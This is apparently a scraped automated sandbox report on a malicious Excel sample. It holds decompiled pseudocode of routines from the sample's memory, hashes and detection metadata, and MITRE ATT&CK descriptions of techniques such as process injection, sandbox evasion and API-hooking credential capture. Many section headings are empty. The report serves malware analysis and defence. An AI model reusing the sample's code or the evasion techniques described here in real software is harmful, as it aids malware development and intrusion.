InterlockedIncrement.KERNEL32(00EF5678), ref: 00EDFCD4
SwitchToThread.KERNEL32(?,00EDE506,00000000,00000000,00EDAB32,0000000C,00000000,t_,00EDB748,?,?,?,0000000C,?,00000000,?), ref: 00EDFD1C

Part of subcall function 00EDFC17: GetModuleHandleA.KERNEL32(advapi32.dll,0000000C,?,00EFF9B8,?), ref: 00EDFC27

_time64.MSVCRT ref: 00EDFCF2
GetCurrentProcessId.KERNEL32(?,00EDE506,00000000,00000000,00EDAB32,0000000C,00000000,t_,00EDB748,?,?,?,0000000C,?,00000000,?), ref: 00EDFCFB

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CurrentHandleIncrementInterlockedModuleProcessSwitchThread_time64
String ID:
API String ID: 2459202522-0
Opcode ID: 908939bb46e339a59b0dd115b1590a5d77baac259f9702fd3ea9c1d8ff2f043e
Instruction ID: 5c3c5a0a4987e611f6fc98f9bf33555046cb15c538a446cced61c007beb3b754
Opcode Fuzzy Hash: 908939bb46e339a59b0dd115b1590a5d77baac259f9702fd3ea9c1d8ff2f043e
Instruction Fuzzy Hash: 1CF08C325006189FCB10DF65F8887993BA9EB19764F51902AFD0AFF390DB70D985CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EC5CD5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EC5CD5(intOrPtr* __eax, void* __ecx, char _a4) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __esi;
				intOrPtr* _t25;
				char* _t41;
				intOrPtr* _t46;

				_t46 = __eax;
				_v16 = 0;
				_v12 = 0;
				_v20 = __ecx + __eax;
				_v8 = 0;
				do {
					ArcTo(0, 0x15, 0x50, 0x55, 0x55, 0xc, 0x2d, 0x5f, 0x35);
					if( *_t46 != 1) {
						_t46 = _t46 + 0x17;
					} else {
						if(E00ECD07F(_v8 + 0x20,  &_v16, _v8) != 0) {
							_t41 = _v8 + _v16;
							_v8 = _v8 + 0x20;
							 *_t41 = 1;
							 *((intOrPtr*)(_t41 + 4)) =  *((intOrPtr*)(_t46 + 1));
							_v12 = _v12 + 1;
							 *(_t41 + 8) = ( *(_t46 + 5) & 0x0000ffff) >> 0x00000008 ^ ( *(_t46 + 5) & 0x0000ffff) << 0x00000008;
							_t46 = _t46 + 7;
						}
					}
				} while (_t46 < _v20);
				_t19 =  &_a4; // 0xec5b24
				_t25 =  *_t19;
				if(_t25 != 0) {
					 *_t25 = _v12;
				}
				return _v16;
			}

0x00ec5cde
0x00ec5ce4
0x00ec5ce7
0x00ec5cea
0x00ec5ced
0x00ec5cf0
0x00ec5d04
0x00ec5d0d
0x00ec5d53
0x00ec5d0f
0x00ec5d21
0x00ec5d26
0x00ec5d29
0x00ec5d2d
0x00ec5d33
0x00ec5d47
0x00ec5d4a
0x00ec5d4e
0x00ec5d4e
0x00ec5d21
0x00ec5d56
0x00ec5d5b
0x00ec5d5b
0x00ec5d63
0x00ec5d68
0x00ec5d68
0x00ec5d6e

APIs

ArcTo.GDI32(00000000,00000015,00000050,00000055,00000055,0000000C,0000002D,0000005F,00000035,00000000,00000000,00000000,?,?,00EC5B24,?), ref: 00EC5D04

Strings

$[, xrefs: 00EC5D5B
, xrefs: 00EC5D29

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $$[
API String ID: 0-2459060862
Opcode ID: be1d09872fe997aad13cb7a0b19246aeec456a96a3882c6c05608a9be62d6061
Instruction ID: ac01961ccff1d558613b587450263359e3815f61ba8a1f1f1d1593b8efb2d9ca
Opcode Fuzzy Hash: be1d09872fe997aad13cb7a0b19246aeec456a96a3882c6c05608a9be62d6061
Instruction Fuzzy Hash: 5D11DF71A0060AABDB10DBA8CD45FDEBBB5EF44315F1441A9E504BB281E3B1AA82CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2026, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00ED2026(intOrPtr _a4, char _a8, intOrPtr _a12) {
				void* _t4;

				_t4 = E00ED1C7A("%s:%d: OpenSSL internal error: %s\n", _a8);
				__imp__raise(0x16, _a12, _a4);
				_exit(3);
				return _t4;
			}

0x00ed2037
0x00ed2041
0x00ed204a
0x00ed2051

APIs

Part of subcall function 00ED1C7A: GetStdHandle.KERNEL32(000000F4), ref: 00ED1C85
Part of subcall function 00ED1C7A: GetFileType.KERNEL32(00000000), ref: 00ED1C9B
Part of subcall function 00ED1C7A: _vsnprintf.MSVCRT ref: 00ED1CC3
Part of subcall function 00ED1C7A: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00ED1D0C

raise.MSVCRT ref: 00ED2041
_exit.MSVCRT ref: 00ED204A

Strings

%s:%d: OpenSSL internal error: %s, xrefs: 00ED2032

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: File$HandleTypeWrite_exit_vsnprintfraise
String ID: %s:%d: OpenSSL internal error: %s
API String ID: 1829284227-569889646
Opcode ID: e4df798c7c3fac28125446f096953b555b28cac12607d8c3b4386c554e1c0eb3
Instruction ID: ed4dc455b99de88d345cce47cd9e6bebe0f5c528d1907fe3863ae667f51137d4
Opcode Fuzzy Hash: e4df798c7c3fac28125446f096953b555b28cac12607d8c3b4386c554e1c0eb3
Instruction Fuzzy Hash: E0D09E3214024DBFDB062FD19C06A9D3B15EB05750F084455F6181819196B296619A52

Uniqueness

Uniqueness Score: -1.00%

Function 00EC3B12, Relevance: 5.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00EC3B12(intOrPtr _a4, intOrPtr* _a8, void* _a12, void* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v16;
				int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr* _t85;
				char _t90;

				_v8 = _a20 + 7 >> 3;
				_v28 = _v8 << 3;
				_v20 = _v28 - _a20;
				if(_a20 == 0 || _a20 >= 0x80000000) {
					return 0;
				} else {
					if(_a8 != 0) {
						_v16 =  *_a8;
					} else {
						_t90 =  *0xeea744; // 0xa65959a6
						_v16 = _t90;
					}
					_v12 = _a20 >> 0x00000018 & 0x000000ff;
					_v11 = _a20 >> 0x00000010 & 0x000000ff;
					_v10 = _a20 >> 0x00000008 & 0x000000ff;
					_v9 = _a20 & 0x000000ff;
					if(_v28 != 8) {
						memmove(_a12, _a16, _a20);
						memset(_a12 + _a20, 0, _v20);
						_v24 = E00EC37BA(_a4,  &_v16, _a12, _a12, _v28, _a24);
					} else {
						memmove(_a12 + 8, _a16, _a20);
						_t85 = _a12;
						 *_t85 = _v16;
						 *((intOrPtr*)(_t85 + 4)) = _v12;
						memset(_a12 + _a20 + 8, 0, _v20);
						_a24(_a12, _a12, _a4);
						_v24 = 0x10;
					}
					return _v24;
				}
			}

0x00ec3b21
0x00ec3b2a
0x00ec3b33
0x00ec3b3a
0x00000000
0x00ec3b4c
0x00ec3b50
0x00ec3b61
0x00ec3b52
0x00ec3b52
0x00ec3b57
0x00ec3b57
0x00ec3b6f
0x00ec3b7d
0x00ec3b8b
0x00ec3b96
0x00ec3b9d
0x00ec3bfc
0x00ec3c11
0x00ec3c34
0x00ec3b9f
0x00ec3bac
0x00ec3bb5
0x00ec3bbb
0x00ec3bc0
0x00ec3bd3
0x00ec3be4
0x00ec3bea
0x00ec3bea
0x00000000
0x00ec3c37

APIs

memmove.MSVCRT ref: 00EC3BAC
memset.MSVCRT ref: 00EC3BD3
memmove.MSVCRT ref: 00EC3BFC
memset.MSVCRT ref: 00EC3C11

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: memmovememset
String ID:
API String ID: 1288253900-0
Opcode ID: 0e9abd17051984697010e053d57119fe411a8402bc583695dffffd1df5497324
Instruction ID: c50d3d461bf000fdb1324ada9a8c156bbe1ab9a128ff609e16f7924df1f6436a
Opcode Fuzzy Hash: 0e9abd17051984697010e053d57119fe411a8402bc583695dffffd1df5497324
Instruction Fuzzy Hash: A941F37190024EEFCF01DFA8C946AEEBBB1FF14304F048469F914A7252D236DAA5DB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 9659e9a8_by_Libranalysis.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "9659e9a8_by_Libranalysis.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

Function 01057050, Relevance: 4.9, APIs: 3, Instructions: 379
memoryCOMMONCrypto

Function 0105822A, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 372
memoryCOMMONCrypto

Function 01056743, Relevance: 1.4, Strings: 1, Instructions: 105
COMMONCrypto

Function 01059571, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Function 01053943, Relevance: .8, Instructions: 763
COMMONCrypto

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre